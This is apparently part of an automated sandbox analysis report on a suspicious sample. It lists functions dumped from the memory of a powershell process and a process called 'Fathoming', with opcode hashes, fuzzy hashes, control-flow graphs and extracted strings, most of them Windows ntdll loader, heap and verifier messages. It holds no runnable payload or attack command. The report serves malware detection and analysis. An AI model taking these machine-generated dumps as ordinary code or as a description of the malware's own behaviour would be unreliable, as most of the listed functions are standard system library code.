                                          Function 08E30439 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05c565b39d123dd02c432abff7b3f384b5bc018ac4ee106a8ff74c4f1018d228
                                          • Instruction ID: 01cee2016e48c6a3031f45b290b7b7327e91ebd4dc978fbd4c1ece3dfa30e1ec
                                          • Opcode Fuzzy Hash: 05c565b39d123dd02c432abff7b3f384b5bc018ac4ee106a8ff74c4f1018d228
                                          • Instruction Fuzzy Hash: 4BF0E934E043449FCB01D7E9E844AED7F75FF81260F4041E9D0019B2A2D7655E09C792
                                          Function 08E31214 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fda32ad06733a65c5e6cbaaf3386ff53eb483cb6c372d977fe7abbfa34456519
                                          • Instruction ID: 25acfa6b6fd1ed8dead9db7aefd362197660a952d111b3935b659eb96fe187f9
                                          • Opcode Fuzzy Hash: fda32ad06733a65c5e6cbaaf3386ff53eb483cb6c372d977fe7abbfa34456519
                                          • Instruction Fuzzy Hash: 40F01775A01215AFDB05CB88D890EFEF376FF88324F208158EA15A72A0C732EC52CB50

                                          Non-executed Functions

                                          Function 06FB16D0 Relevance: 5.5, Strings: 4, Instructions: 487COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: l$l$l$l
                                          • API String ID: 0-2658161240
                                          • Opcode ID: 29849fbe435c79052e84a7585a95766184c1c9ffa151c471e26aa22ac06ca312
                                          • Instruction ID: 9b7adeb73710701c6e88ce6d50c010851558e878ff269fc4bf6b5086ea72612e
                                          • Opcode Fuzzy Hash: 29849fbe435c79052e84a7585a95766184c1c9ffa151c471e26aa22ac06ca312
                                          • Instruction Fuzzy Hash: C0F16A32F042149FDBA4CB6AD8217EABBB2AFC2610F24907AD445CB341DA71CD45CBE1
                                          Function 06FBB35A Relevance: 5.5, Strings: 4, Instructions: 471COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$tLk$x.k$-k
                                          • API String ID: 0-1623445408
                                          • Opcode ID: 800aa9fa1060691628cc52e9f8e52b0310a474634beb50b0cd3f47ec44ddd827
                                          • Instruction ID: a665c6a33863885277edfcc067d56c28e1cf6a0af54129ad36c7209d6e32d38f
                                          • Opcode Fuzzy Hash: 800aa9fa1060691628cc52e9f8e52b0310a474634beb50b0cd3f47ec44ddd827
                                          • Instruction Fuzzy Hash: FF226F74E402289FDB64DB14C855BDAB7B2FF89304F109599D80AAB341CB76EE81CF91

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:100%
                                          Total number of Nodes:1
                                          Total number of Limit Nodes:0
                                          execution_graph 81692 21b22b60 LdrInitializeThunk

                                          Executed Functions

                                          Function 21B22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 21b22b60-21b22b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 84cd28db4e4a81d60ef996d468d3e42d6afbb7cd976676a36f1254649a4accc4
                                          • Instruction ID: 7bfe834ffd48abf73826db9dcb54aade552c2de986204de7caf1d1461b6ebf53
                                          • Opcode Fuzzy Hash: 84cd28db4e4a81d60ef996d468d3e42d6afbb7cd976676a36f1254649a4accc4
                                          • Instruction Fuzzy Hash: CF900261202400034509B1584454616502A57E0201B55C131E5018551DC52589A27226
                                          Function 21B22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2 21b22df0-21b22dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: aebdf2431bba8268bfda3c16133cc24c3545cb612f0cb9678b2bc2ecd5f30dcd
                                          • Instruction ID: 374d22d527e165417f3a28df899881f987a0d372977715b4e3f8249a96008caa
                                          • Opcode Fuzzy Hash: aebdf2431bba8268bfda3c16133cc24c3545cb612f0cb9678b2bc2ecd5f30dcd
                                          • Instruction Fuzzy Hash: 6D90023120140413D515B1584544707102957D0241F95C522A4428519DD6568A63B222
                                          Function 21B22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1 21b22c70-21b22c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c6e857e3d56102070efd76a0b907c65401227b5feb038b310a9f8a6f21844f
                                          • Instruction ID: 528bd98864ef38da91941e7cde735d180a6ecabfc3e5e0f4c9aee5be674a7405
                                          • Opcode Fuzzy Hash: a3c6e857e3d56102070efd76a0b907c65401227b5feb038b310a9f8a6f21844f
                                          • Instruction Fuzzy Hash: 1090023120148802D514B158844474A102557D0301F59C521A8428619DC69589A27222
                                          Function 21B235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3 21b235c0-21b235cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 041a64560911cf89de0e1bc4026c0ba983cffd716200471f2e4147a98ce77a88
                                          • Instruction ID: fe6fe49a114eb9166936bb3a159849ae1fc85fdd431523bf43c819adfa31550b
                                          • Opcode Fuzzy Hash: 041a64560911cf89de0e1bc4026c0ba983cffd716200471f2e4147a98ce77a88
                                          • Instruction Fuzzy Hash: 9A90023160550402D504B1584554706202557D0201F65C521A4428529DC7958A6276A3

                                          Non-executed Functions

                                          Function 21B62349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: bbc5ecf08176fcde295854b49d73d27b46c4d123aebabd4aa0d51d8dc025dc8d
                                          • Instruction ID: 54f9d8db1546ae76d07569cf7d7a18bc77d329d0b3d016826bcf0b0eb04194fc
                                          • Opcode Fuzzy Hash: bbc5ecf08176fcde295854b49d73d27b46c4d123aebabd4aa0d51d8dc025dc8d
                                          • Instruction Fuzzy Hash: 77927A71A04782AFE729CE14C880B5BB7F8FBA9750F00496DFA98D7260D774D844CB92
                                          Function 21B18620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1075 21b18620-21b18681 1076 21b55297-21b5529d 1075->1076 1077 21b18687-21b18698 1075->1077 1076->1077 1078 21b552a3-21b552b0 GetPEB 1076->1078 1078->1077 1079 21b552b6-21b552b9 1078->1079 1080 21b552d6-21b552fc call 21b22ce0 1079->1080 1081 21b552bb-21b552c5 1079->1081 1080->1077 1086 21b55302-21b55306 1080->1086 1081->1077 1082 21b552cb-21b552d4 1081->1082 1084 21b5532d-21b55341 call 21ae54a0 1082->1084 1091 21b55347-21b55353 1084->1091 1086->1077 1088 21b5530c-21b55321 call 21b22ce0 1086->1088 1088->1077 1097 21b55327 1088->1097 1092 21b5555c-21b55568 call 21b5556d 1091->1092 1093 21b55359-21b5536d 1091->1093 1092->1077 1095 21b5536f 1093->1095 1096 21b5538b-21b55401 1093->1096 1100 21b55371-21b55378 1095->1100 1103 21b55403-21b55435 call 21adfd50 1096->1103 1104 21b5543a-21b5543d 1096->1104 1097->1084 1100->1096 1102 21b5537a-21b5537c 1100->1102 1105 21b55383-21b55385 1102->1105 1106 21b5537e-21b55381 1102->1106 1115 21b5554d-21b55552 call 21b6a4b0 1103->1115 1108 21b55514-21b55517 1104->1108 1109 21b55443-21b55494 1104->1109 1105->1096 1110 21b55555-21b55557 1105->1110 1106->1100 1108->1110 1111 21b55519-21b55548 call 21adfd50 1108->1111 1116 21b55496-21b554cc call 21adfd50 1109->1116 1117 21b554ce-21b55512 call 21adfd50 * 2 1109->1117 1110->1091 1111->1115 1115->1110 1116->1115 1117->1115
                                          Strings
                                          • corrupted critical section, xrefs: 21B554C2
                                          • Thread identifier, xrefs: 21B5553A
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 21B554CE
                                          • double initialized or corrupted critical section, xrefs: 21B55508
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 21B55543
                                          • Critical section debug info address, xrefs: 21B5541F, 21B5552E
                                          • undeleted critical section in freed memory, xrefs: 21B5542B
                                          • Invalid debug info address of this critical section, xrefs: 21B554B6
                                          • Critical section address., xrefs: 21B55502
                                          • Address of the debug info found in the active list., xrefs: 21B554AE, 21B554FA
                                          • 8, xrefs: 21B552E3
                                          • Critical section address, xrefs: 21B55425, 21B554BC, 21B55534
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 21B554E2
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 21B5540A, 21B55496, 21B55519
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 794100a663e20d76fb0c978e36bdb51e459b74a95a1e6952b7bba2c0812f4e24
                                          • Instruction ID: 4ff11ddfa880847c06331e79e0d2668bb9133182c244b8e161a6ec4abaa16cb6
                                          • Opcode Fuzzy Hash: 794100a663e20d76fb0c978e36bdb51e459b74a95a1e6952b7bba2c0812f4e24
                                          • Instruction Fuzzy Hash: 6881BAB1A00248FFDB58CF95C980F9EBBB9FB09714F204129F508B7295D335A945CBA0
                                          Function 21B90274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1298 21b90274-21b90296 call 21b37e54 1301 21b90298-21b902b0 RtlDebugPrintTimes 1298->1301 1302 21b902b5-21b902cd call 21ad76b2 1298->1302 1306 21b90751-21b90760 1301->1306 1307 21b902d3-21b902e9 1302->1307 1308 21b906f7 1302->1308 1310 21b902eb-21b902ee 1307->1310 1311 21b902f0-21b902f2 1307->1311 1309 21b906fa-21b9074e call 21b90766 1308->1309 1309->1306 1313 21b902f3-21b9030a 1310->1313 1311->1313 1315 21b906b1-21b906ba GetPEB 1313->1315 1316 21b90310-21b90313 1313->1316 1318 21b906d9-21b906de call 21adb970 1315->1318 1319 21b906bc-21b906d7 GetPEB call 21adb970 1315->1319 1316->1315 1320 21b90319-21b90322 1316->1320 1328 21b906e3-21b906f4 call 21adb970 1318->1328 1319->1328 1321 21b9033e-21b90351 call 21b90cb5 1320->1321 1322 21b90324-21b9033b call 21aeffb0 1320->1322 1332 21b9035c-21b90370 call 21ad758f 1321->1332 1333 21b90353-21b9035a 1321->1333 1322->1321 1328->1308 1337 21b905a2-21b905a7 1332->1337 1338 21b90376-21b90382 GetPEB 1332->1338 1333->1332 1337->1309 1341 21b905ad-21b905b9 GetPEB 1337->1341 1339 21b903f0-21b903fb 1338->1339 1340 21b90384-21b90387 1338->1340 1342 21b904e8-21b904fa call 21af27f0 1339->1342 1343 21b90401-21b90408 1339->1343 1344 21b90389-21b903a4 GetPEB call 21adb970 1340->1344 1345 21b903a6-21b903ab call 21adb970 1340->1345 1346 21b905bb-21b905be 1341->1346 1347 21b90627-21b90632 1341->1347 1366 21b90590-21b9059d call 21b911a4 call 21b90cb5 1342->1366 1367 21b90500-21b90507 1342->1367 1343->1342 1350 21b9040e-21b90417 1343->1350 1356 21b903b0-21b903d1 call 21adb970 GetPEB 1344->1356 1345->1356 1353 21b905dd-21b905e2 call 21adb970 1346->1353 1354 21b905c0-21b905db GetPEB call 21adb970 1346->1354 1347->1309 1351 21b90638-21b90643 1347->1351 1359 21b90419-21b90429 1350->1359 1360 21b90438-21b9043c 1350->1360 1351->1309 1361 21b90649-21b90654 1351->1361 1365 21b905e7-21b905fb call 21adb970 1353->1365 1354->1365 1356->1342 1385 21b903d7-21b903eb 1356->1385 1359->1360 1368 21b9042b-21b90435 call 21b9dac6 1359->1368 1370 21b9044e-21b90454 1360->1370 1371 21b9043e-21b9044c call 21b13bc9 1360->1371 1361->1309 1369 21b9065a-21b90663 GetPEB 1361->1369 1396 21b905fe-21b90608 GetPEB 1365->1396 1366->1337 1375 21b90509-21b90510 1367->1375 1376 21b90512-21b9051a 1367->1376 1368->1360 1379 21b90682-21b90687 call 21adb970 1369->1379 1380 21b90665-21b90680 GetPEB call 21adb970 1369->1380 1372 21b90457-21b90460 1370->1372 1371->1372 1383 21b90472-21b90475 1372->1383 1384 21b90462-21b90470 1372->1384 1375->1376 1387 21b90538-21b9053c 1376->1387 1388 21b9051c-21b9052c 1376->1388 1393 21b9068c-21b906ac call 21b886ba call 21adb970 1379->1393 1380->1393 1394 21b904e5 1383->1394 1395 21b90477-21b9047e 1383->1395 1384->1383 1385->1342 1399 21b9056c-21b90572 1387->1399 1400 21b9053e-21b90551 call 21b13bc9 1387->1400 1388->1387 1397 21b9052e-21b90533 call 21b9dac6 1388->1397 1393->1396 1394->1342 1395->1394 1403 21b90480-21b9048b 1395->1403 1396->1309 1405 21b9060e-21b90622 1396->1405 1397->1387 1404 21b90575-21b9057c 1399->1404 1412 21b90563 1400->1412 1413 21b90553-21b90561 call 21b0fe99 1400->1413 1403->1394 1409 21b9048d-21b90496 GetPEB 1403->1409 1404->1366 1410 21b9057e-21b9058e 1404->1410 1405->1309 1415 21b90498-21b904b3 GetPEB call 21adb970 1409->1415 1416 21b904b5-21b904ba call 21adb970 1409->1416 1410->1366 1418 21b90566-21b9056a 1412->1418 1413->1418 1424 21b904bf-21b904dd call 21b886ba call 21adb970 1415->1424 1416->1424 1418->1404 1424->1394
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311
                                          • Opcode ID: 9dd0703de8c0154c8feab8616489200f8f43ddc12e1ad88a3cc61258fb7f59c1
                                          • Instruction ID: 2e88feb7142824f1fcfa369735be55777af1465492d4473d2742205096c0fb46
                                          • Opcode Fuzzy Hash: 9dd0703de8c0154c8feab8616489200f8f43ddc12e1ad88a3cc61258fb7f59c1
                                          • Instruction Fuzzy Hash: 5FD10036601682DFDB1ACF64C490AAEBBF9FF5A310F14806DE5459B662C734DA82CF50
                                          Function 21B129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 21B525EB
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 21B52412
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 21B5261F
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 21B52498
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 21B52506
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 21B52602
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 21B522E4
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 21B524C0
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 21B52624
                                          • @, xrefs: 21B5259B
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 21B52409
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          • Opcode ID: d1d97d037a480075c424ca954eddf37f2b395ef85b407f4e5b8b4b0a15bf7a32
                                          • Instruction ID: aa794f5e0589e7b3a9339ffb056abf4ea011453abfe1e97167535fe4702f2b07
                                          • Opcode Fuzzy Hash: d1d97d037a480075c424ca954eddf37f2b395ef85b407f4e5b8b4b0a15bf7a32
                                          • Instruction Fuzzy Hash: 2C027FF1D01269AFDB65CB54CD80B9AB7B8AF55304F0141EAE708A7251EB309F84CF69
                                          Function 21B88B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: b832fc7cc739fd49076c51985994ae5403cb8393b3fd73332be090bb1631724b
                                          • Instruction ID: 6d99d4c7fd111e2c4ea94317deb0870dd8b70b16bfa7724138f4c840e8946c9c
                                          • Opcode Fuzzy Hash: b832fc7cc739fd49076c51985994ae5403cb8393b3fd73332be090bb1631724b
                                          • Instruction Fuzzy Hash: 4B51D2715043419BCB2ACF548980B9BBBFCFFA9B50F114A2DE958C3295E770C644CB92
                                          Function 21AD645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 21AD656C
                                            • Part of subcall function 21AD65B5: RtlDebugPrintTimes.NTDLL ref: 21AD6664
                                            • Part of subcall function 21AD65B5: RtlDebugPrintTimes.NTDLL ref: 21AD66AF
                                          Strings
                                          • LdrpInitShimEngine, xrefs: 21B399F4, 21B39A07, 21B39A30
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 21B39A01
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 21B39A2A
                                          • apphelp.dll, xrefs: 21AD6496
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 21B399ED
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B39A11, 21B39A3A
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          • Opcode ID: 4ca5fc8a3cee87b7381296903f5c8df7be0f0a1e1a849e5b33de946a83f2fa98
                                          • Instruction ID: 788df217573ceaf89b7297738c87843b170c882c23c697fb7ee568a245fc95c7
                                          • Opcode Fuzzy Hash: 4ca5fc8a3cee87b7381296903f5c8df7be0f0a1e1a849e5b33de946a83f2fa98
                                          • Instruction Fuzzy Hash: FE519E722487059FE719CF28C990E9B77F8FF88744F400A1EF99997161DA30E945CB92
                                          Function 21B689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 21B68A67
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 21B68A3D
                                          • VerifierDebug, xrefs: 21B68CA5
                                          • HandleTraces, xrefs: 21B68C8F
                                          • AVRF: -*- final list of providers -*- , xrefs: 21B68B8F
                                          • VerifierFlags, xrefs: 21B68C50
                                          • VerifierDlls, xrefs: 21B68CBD
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
